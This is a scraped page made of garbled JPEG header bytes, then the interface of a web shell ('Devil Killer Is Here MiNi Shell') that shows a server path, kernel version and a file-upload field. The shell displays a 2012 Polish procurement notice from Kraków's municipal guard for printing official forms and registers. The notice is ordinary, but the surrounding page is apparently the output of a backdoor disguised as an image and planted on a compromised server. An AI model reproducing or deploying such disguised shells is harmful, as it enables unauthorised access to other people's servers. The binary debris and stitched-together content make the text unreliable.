JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120224/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120224/55890-N-2012.html

<p class="kh_header"><b>Kraków: Drukowanie materiałów służbowych II</b><br>
<b>Numer ogłoszenia: 55890 - 2012; data zamieszczenia: 24.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Straż Miejska Miasta Krakowa , ul. Dobrego Pasterza 116, 31-416 Kraków, woj. małopolskie, tel. 12 68 82 154, faks 12 68 82 292.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.krakow.pl/?bip_id=33&mmi=11723</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Drukowanie materiałów służbowych II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa drukowania materiałów służbowych (druki służbowe, rejestry, papier firmowy) zgodnych ze wzorami używanymi przez Straż Miejską Miasta Krakowa.

Część 1 - druki służbowe:
                   Oznaczenie przedmiotu zamówienia wg CPV 798100 00-5

Druk nr 1 - dyspozycja usunięcia pojazdu  - 200 bloczków (wzór nr 1)
Druki będą wykonane  w formacie A5, na papierze białym, każda kartka zadrukowana jednostronne w kolorze czarnym, każdy formularz w trzech egzemplarzach, przy czym egzemplarz 1 i 2  wykonane muszą być na papierze samokopiującym. Druki wzdłuż krótszej krawędzi muszą być sklejone w bloczki 33 x 3 w sposób umożliwiający łatwe odrywanie kartek. Bloczki muszą być z obu stron oprawione w okładki ze sztywnego kartonu,  służące jako przekładki.
Druk nr 2 - informacja (UWAGA! ZAŁOŻONA BLOKADA) 50 000 szt. (wzór nr 2)
Druki będą wykonane na papierze białym,80g/m2, każda kartka zadrukowana jednostronne w kolorze czarnym. Wielkość  informacji 210 x 50 mm; napis wielkimi literami,  umieszczony centralnie. Przy dostawie druki należy oddzielić przekładkami w partie po 100 szt.
Druk nr 3 - informacja dla kierowcy - 400 bloczków  (wzór nr 3)
Druki będą wykonane  w formacie A6, na papierze białym, każda kartka zadrukowana jednostronne w kolorze czarnym, każdy formularz w dwóch egzemplarzach, przy czym pierwszy egzemplarz musi być wykonany  na papierze samokopiującym. Druki wzdłuż krótszej krawędzi muszą być sklejone w bloczki 50 x 2 w sposób umożliwiający łatwe odrywanie kartek. Bloczki muszą być z obu stron oprawione w okładki ze sztywnego  kartonu,  służące jako przekładki.
Druk nr 4 - karta rejestracyjna prd-5  - 1500 bloczków  (wzór nr 4)
Druki będą wykonane  w formacie A6, na papierze białym, 80g/m2, każda kartka zadrukowana  dwustronne w kolorze czarnym. Druki wzdłuż krótszej krawędzi muszą być sklejone w bloczki po 50 szt.  w sposób umożliwiający łatwe odrywanie kartek. Bloczki muszą być z obu stron oprawione w okładki ze sztywnego  kartonu,  służące jako przekładki.
Druk nr 5 - notatka ujawnienia osoby nietrzeźwej - 5 000  szt. (wzór nr 5)
Druki będą wykonane w formacie A4 na papierze białym, 80g/m2,  każda kartka zadrukowana dwustronnie w kolorze czarnym. Przy dostawie druki należy oddzielić przekładkami w partie po 100 szt.
Druk nr 6 - notatka urzędowa z miejsca wykroczenia - 15 000 szt. (wzór nr 6)
Druki będą wykonane w formacie A4 na papierze białym, 80g/m2, każda kartka zadrukowana dwustronnie w kolorze czarnym. Przy dostawie druki należy oddzielić przekładkami w partie po 100 szt.
Druk nr 7 - protokół doprowadzenia w celu wytrzeźwienia - 10 000  szt. (wzór nr 7)
Druki będą wykonane w formacie A4 na papierze białym, 80g/m2, każda kartka zadrukowana dwustronnie w kolorze czarnym. Przy dostawie druki należy oddzielić przekładkami w partie po 100 szt.
Druk nr 8 - wezwanie dla kierowcy   -  750 bloczków (wzór nr 8)
Druki będą wykonane  w formacie A6, na papierze białym, każda kartka zadrukowana jednostronne w kolorze czarnym, każdy formularz w dwóch egzemplarzach, przy czym pierwszy egzemplarz musi być wykonany  na papierze samokopiującym. Druki wzdłuż krótszej krawędzi muszą być sklejone w bloczki 50 x 2 w sposób umożliwiający łatwe odrywanie kartek. Bloczki muszą być z obu stron oprawione w okładki ze sztywnego  kartonu,  służące jako przekładki. 
Druk nr 9   -  wezwanie dla sprawcy - 10 000 szt. (wzór nr 9)
Druki będą wykonane  podwójnym  formacie A6, składane,  na papierze białym, 80g/m2,  każda kartka zadrukowana dwustronnie w kolorze czarnym. Wzdłuż złożenia należy wykonać perforację umożliwiającą łatwo odrywania kartek. Przy dostawie druki należy oddzielić przekładkami w partie po 100 szt.
Druk nr 10  -  wezwanie dla świadka - 4 000 szt. (wzór nr 10)
Druki będą wykonane  podwójnym  formacie A6, składane,  na papierze białym, 80g/m2, każda kartka zadrukowana dwustronnie w kolorze czarnym. Wzdłuż złożenia należy wykonać perforację umożliwiającą łatwo odrywania kartek. Przy dostawie druki należy oddzielić przekładkami w partie po 100 szt.
Druk nr 11  -  meldunek z blokad - 2 000 szt. (wzór nr 11)
Druki będą wykonane w formacie A4 na papierze białym, 80g/m2,  każda kartka zadrukowana dwustronnie w kolorze czarnym. Przy dostawie druki należy oddzielić przekładkami w partie po 100 szt.
 Część 2  - rejestry:
Oznaczenie przedmiotu zamówienia wg CPV 798100 00-5, 798210 00-5

 Rejestr nr 1 - książka kontroli pracy pojazdu (24 str.) - 300 szt. (wzór nr 12)
Rejestry  będą wykonane w formacie A5, układ pionowy, na papierze białym, 80g/m2,  każda kartka zadrukowana dwustronnie w kolorze czarnym. Ilość stron razem z okładkami - 24, strony numerowane. Kartki w rejestrze zszyte w sposób trwały w formę zeszytu.
Rejestr nr 2 - książka odpraw do służby - 100 szt. (wzór nr 13)
Rejestry  będą wykonane w formacie A4 na papierze białym, 80g/m2,  każda kartka zadrukowana dwustronnie w kolorze czarnym. Treść strony tytułowej i wnętrza rejestru - zgodna ze wzorem.  Ilość stron, bez strony tytułowej - 200, strony numerowane. Rejestry muszą być oprawione w okładkę kartonową, min. 200g/m2, na okładce musi być umieszczona nazwa rejestru. Kartki rejestru wraz z okładką muszą być zszyte w sposób trwały. Grzbiet powinien być przykryty okładką.
Rejestr nr 3 - książka służby- 100 szt. (wzór nr 14)
Rejestry  będą wykonane w formacie A4 na papierze białym, 80g/m2,  każda kartka zadrukowana dwustronnie w kolorze czarnym. Treść strony tytułowej i wnętrza rejestru - zgodna ze wzorem.  Ilość stron, bez strony tytułowej - 200, strony numerowane. Rejestry muszą być oprawione w okładkę kartonową, min. 200g/m2, na okładce musi być umieszczona nazwa rejestru. Kartki rejestru wraz z okładką muszą być zszyte w sposób trwały. Grzbiet powinien być przykryty okładką.
Rejestr nr 4 - książka wydawania i przyjęcia rmg i paralizatorów - 10 szt. (wzór nr 15)
Rejestry  będą wykonane w formacie A4 na papierze białym, 80g/m2,  każda kartka zadrukowana dwustronnie w kolorze czarnym. Treść strony tytułowej i wnętrza rejestru - zgodna ze wzorem.  Ilość stron, bez strony tytułowej - 200, strony numerowane. Rejestry muszą być oprawione w okładkę kartonową, min. 200g/m2, na okładce musi być umieszczona nazwa rejestru. Kartki rejestru wraz z okładką muszą być zszyte w sposób trwały. Grzbiet powinien być przykryty okładką.
Rejestr nr 5 - raport dyspozytora - 50  szt. (wzór nr 16)
Rejestry  będą wykonane w formacie A4 na papierze białym, 80g/m2,  każda kartka zadrukowana dwustronnie w kolorze czarnym. Treść strony tytułowej i wnętrza rejestru - zgodna ze wzorem.  Ilość stron, bez strony tytułowej - 200, strony numerowane. Rejestry muszą być oprawione w okładkę kartonową, min. 200g/m2, na okładce musi być umieszczona nazwa rejestru. Kartki rejestru wraz z okładką muszą być zszyte w sposób trwały. Grzbiet powinien być przykryty okładką.
Rejestr nr 6 - rejestr odholowanych pojazdów - 20  szt. (wzór nr 17)
Rejestry  będą wykonane w formacie A4 na papierze białym, 80g/m2,  każda kartka zadrukowana dwustronnie w kolorze czarnym. Treść strony tytułowej i wnętrza rejestru - zgodna ze wzorem.  Ilość stron, bez strony tytułowej - 200, strony numerowane. Rejestry muszą być oprawione w okładkę kartonową, min. 200g/m2, na okładce musi być umieszczona nazwa rejestru. Kartki rejestru wraz z okładką muszą być zszyte w sposób trwały. Grzbiet powinien być przykryty okładką.
Rejestr nr 7 - rejestr wydawania i zwrotu radiotelefonów - 20  szt. (wzór nr 18)
Rejestry  będą wykonane w formacie A4 na papierze białym, 80g/m2,  każda kartka zadrukowana dwustronnie w kolorze czarnym. Treść strony tytułowej i wnętrza rejestru - zgodna ze wzorem.  Ilość stron, bez strony tytułowej - 200, strony numerowane. Rejestry muszą być oprawione w okładkę kartonową, min. 200g/m2, na okładce musi być umieszczona nazwa rejestru. Kartki rejestru wraz z okładką muszą być zszyte w sposób trwały. Grzbiet powinien być przykryty okładką.
Rejestr nr 8 - rejestr interwencji z monitoringu - 50  szt. (wzór nr 19)
Rejestry  będą wykonane w formacie A4 na papierze białym, 80g/m2,  każda kartka zadrukowana dwustronnie w kolorze czarnym. Treść strony tytułowej i wnętrza rejestru - zgodna ze wzorem.  Ilość stron, bez strony tytułowej - 200, strony numerowane. Rejestry muszą być oprawione w okładkę kartonową, min. 200g/m2, na okładce musi być umieszczona nazwa rejestru. Kartki rejestru wraz z okładką muszą być zszyte w sposób trwały. Grzbiet powinien być przykryty okładką.
Rejestr nr 9 - zestawienie odcinków D mandatów karnych - 20  szt. (wzór nr 20A)
Rejestry  będą wykonane w formacie A4 na papierze białym, 80g/m2,  każda kartka zadrukowana dwustronnie w kolorze czarnym. Treść strony tytułowej i wnętrza rejestru - zgodna ze wzorem.  Ilość stron, bez strony tytułowej - 100, strony numerowane. Rejestry muszą być oprawione w okładkę kartonową, min. 200g/m2, na okładce musi być umieszczona nazwa rejestru. Kartki rejestru wraz z okładką muszą być zszyte w sposób trwały. Grzbiet powinien być przykryty okładką.

 
Część 3  - druki firmowe
                Oznaczenie przedmiotu zamówienia wg CPV 798100 00-5

p-1 Komendant Straży Miejskiej Miasta Krakowa - 3 000 szt.  (wzór nr 20)
p-2 Straż Miejska Miasta Krakowa  - 4 000 szt. (wzór nr 21)
p-3 SMMK - Oddział I Śródmieście - 2 000 szt. (wzór nr 22)
p-4 SMMK - Oddział II Krowodrza - 1 000 szt. (wzór nr 23)
p-5 SMMK - Oddział III Nowa Huta - 1 000 szt. (wzór nr 24)
p-6 SMMK - Oddział IV Podgórze  - 1 000 szt. (wzór nr 25)
p-7 SMMK - Oddział V Wola Duchacka - 1 000 szt. (wzór nr 26)
p-8 SMMK - Oddział VI Wzgórza Krzesławickie - 1 000 szt. (wzór nr 27)
p-9 SMMK - Referat ds. Wykroczeń - 7 000 szt. (wzór nr 28)

Każdy rodzaj druku wykonany musi być na papierze białym min. 160 CIE (+/-3), gramatura 90 g/m2, gatunek I.    W nagłówku: pasek kolorze ciemnogranatowym z białymi napisami,  emblemat w kolorze ciemnogranatowym obwiedziony żółtą obwódką, napisy w kolorze żółtym, herb Krakowa zgodnie z kolorystyką. W stopce: wszystkie napisy w kolorze ciemnogranatowym, logo certyfikatu jakości zgodnie z kolorystyką. Przy dostawie każdy rodzaj druku musi być spakowany oddzielnie, w partiach po 500 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Jeżeli w okresie 1 roku od udzielenia zamówienia podstawowego wystąpi konieczność rozszerzenia usługi, której zakres nie przekroczy łącznie 50 % wartości zamówienia podstawowego, a wykonanie jej stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia, to Wykonawca zobowiązany jest wykonać tę usługę, na dodatkowe zamówienie Zamawiającego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.81.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 23.03.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Dla części I 400,00 zł;
dla części II 300,00 zł;
dla części III 90,00 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku nastąpi na podstawie załączonego do oferty oświadczenia Wykonawcy, potwierdzającego spełnienie warunków określonych w art. 22 ust. 1 Ustawy, zgodnie z załącznikiem nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku nastąpi na podstawie załączonego do oferty oświadczenia Wykonawcy, potwierdzającego spełnienie warunków określonych w art. 22 ust. 1 Ustawy, zgodnie z załącznikiem nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku nastąpi na podstawie załączonego do oferty oświadczenia Wykonawcy, potwierdzającego spełnienie warunków określonych w art. 22 ust. 1 Ustawy, zgodnie z załącznikiem nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku nastąpi na podstawie załączonego do oferty oświadczenia Wykonawcy, potwierdzającego spełnienie warunków określonych w art. 22 ust. 1 Ustawy, zgodnie z załącznikiem nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku nastąpi na podstawie załączonego do oferty oświadczenia Wykonawcy, potwierdzającego spełnienie warunków określonych w art. 22 ust. 1 Ustawy, zgodnie z załącznikiem nr 3 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.krakow.pl/?bip_id=33&mmi=11723<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Straż Miejska Miasta Krakowa
ul. Dobrego Pasterza 116
31-416 Kraków
pok. 315.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.03.2012 godzina 11:30, miejsce: Straż Miejska Miasta Krakowa
ul. Dobrego Pasterza 116
31-416 Kraków
pok. 315.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Druki służbowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Druk nr 1 - dyspozycja usunięcia pojazdu  - 200 bloczków (wzór nr 1)
Druki będą wykonane  w formacie A5, na papierze białym, każda kartka zadrukowana jednostronne w kolorze czarnym, każdy formularz w trzech egzemplarzach, przy czym egzemplarz 1 i 2  wykonane muszą być na papierze samokopiującym. Druki wzdłuż krótszej krawędzi muszą być sklejone w bloczki 33 x 3 w sposób umożliwiający łatwe odrywanie kartek. Bloczki muszą być z obu stron oprawione w okładki ze sztywnego kartonu,  służące jako przekładki.
Druk nr 2 - informacja (UWAGA! ZAŁOŻONA BLOKADA) 50 000 szt. (wzór nr 2)
Druki będą wykonane na papierze białym,80g/m2, każda kartka zadrukowana jednostronne w kolorze czarnym. Wielkość  informacji 210 x 50 mm; napis wielkimi literami,  umieszczony centralnie. Przy dostawie druki należy oddzielić przekładkami w partie po 100 szt.
Druk nr 3 - informacja dla kierowcy - 400 bloczków  (wzór nr 3)
Druki będą wykonane  w formacie A6, na papierze białym, każda kartka zadrukowana jednostronne w kolorze czarnym, każdy formularz w dwóch egzemplarzach, przy czym pierwszy egzemplarz musi być wykonany  na papierze samokopiującym. Druki wzdłuż krótszej krawędzi muszą być sklejone w bloczki 50 x 2 w sposób umożliwiający łatwe odrywanie kartek. Bloczki muszą być z obu stron oprawione w okładki ze sztywnego  kartonu,  służące jako przekładki.
Druk nr 4 - karta rejestracyjna prd-5  - 1500 bloczków  (wzór nr 4)
Druki będą wykonane  w formacie A6, na papierze białym, 80g/m2, każda kartka zadrukowana  dwustronne w kolorze czarnym. Druki wzdłuż krótszej krawędzi muszą być sklejone w bloczki po 50 szt.  w sposób umożliwiający łatwe odrywanie kartek. Bloczki muszą być z obu stron oprawione w okładki ze sztywnego  kartonu,  służące jako przekładki.
Druk nr 5 - notatka ujawnienia osoby nietrzeźwej - 5 000  szt. (wzór nr 5)
Druki będą wykonane w formacie A4 na papierze białym, 80g/m2,  każda kartka zadrukowana dwustronnie w kolorze czarnym. Przy dostawie druki należy oddzielić przekładkami w partie po 100 szt.
Druk nr 6 - notatka urzędowa z miejsca wykroczenia - 15 000 szt. (wzór nr 6)
Druki będą wykonane w formacie A4 na papierze białym, 80g/m2, każda kartka zadrukowana dwustronnie w kolorze czarnym. Przy dostawie druki należy oddzielić przekładkami w partie po 100 szt.
Druk nr 7 - protokół doprowadzenia w celu wytrzeźwienia - 10 000  szt. (wzór nr 7)
Druki będą wykonane w formacie A4 na papierze białym, 80g/m2, każda kartka zadrukowana dwustronnie w kolorze czarnym. Przy dostawie druki należy oddzielić przekładkami w partie po 100 szt.
Druk nr 8 - wezwanie dla kierowcy   -  750 bloczków (wzór nr 8)
Druki będą wykonane  w formacie A6, na papierze białym, każda kartka zadrukowana jednostronne w kolorze czarnym, każdy formularz w dwóch egzemplarzach, przy czym pierwszy egzemplarz musi być wykonany  na papierze samokopiującym. Druki wzdłuż krótszej krawędzi muszą być sklejone w bloczki 50 x 2 w sposób umożliwiający łatwe odrywanie kartek. Bloczki muszą być z obu stron oprawione w okładki ze sztywnego  kartonu,  służące jako przekładki. 
Druk nr 9   -  wezwanie dla sprawcy - 10 000 szt. (wzór nr 9)
Druki będą wykonane  podwójnym  formacie A6, składane,  na papierze białym, 80g/m2,  każda kartka zadrukowana dwustronnie w kolorze czarnym. Wzdłuż złożenia należy wykonać perforację umożliwiającą łatwo odrywania kartek. Przy dostawie druki należy oddzielić przekładkami w partie po 100 szt.
Druk nr 10  -  wezwanie dla świadka - 4 000 szt. (wzór nr 10)
Druki będą wykonane  podwójnym  formacie A6, składane,  na papierze białym, 80g/m2, każda kartka zadrukowana dwustronnie w kolorze czarnym. Wzdłuż złożenia należy wykonać perforację umożliwiającą łatwo odrywania kartek. Przy dostawie druki należy oddzielić przekładkami w partie po 100 szt.
Druk nr 11  -  meldunek z blokad - 2 000 szt. (wzór nr 11)
Druki będą wykonane w formacie A4 na papierze białym, 80g/m2,  każda kartka zadrukowana dwustronnie w kolorze czarnym. Przy dostawie druki należy oddzielić przekładkami w partie po 100 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.81.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 23.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Rejestry.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 2  - rejestry:
Oznaczenie przedmiotu zamówienia wg CPV 798100 00-5, 798210 00-5

 Rejestr nr 1 - książka kontroli pracy pojazdu (24 str.) - 300 szt. (wzór nr 12)
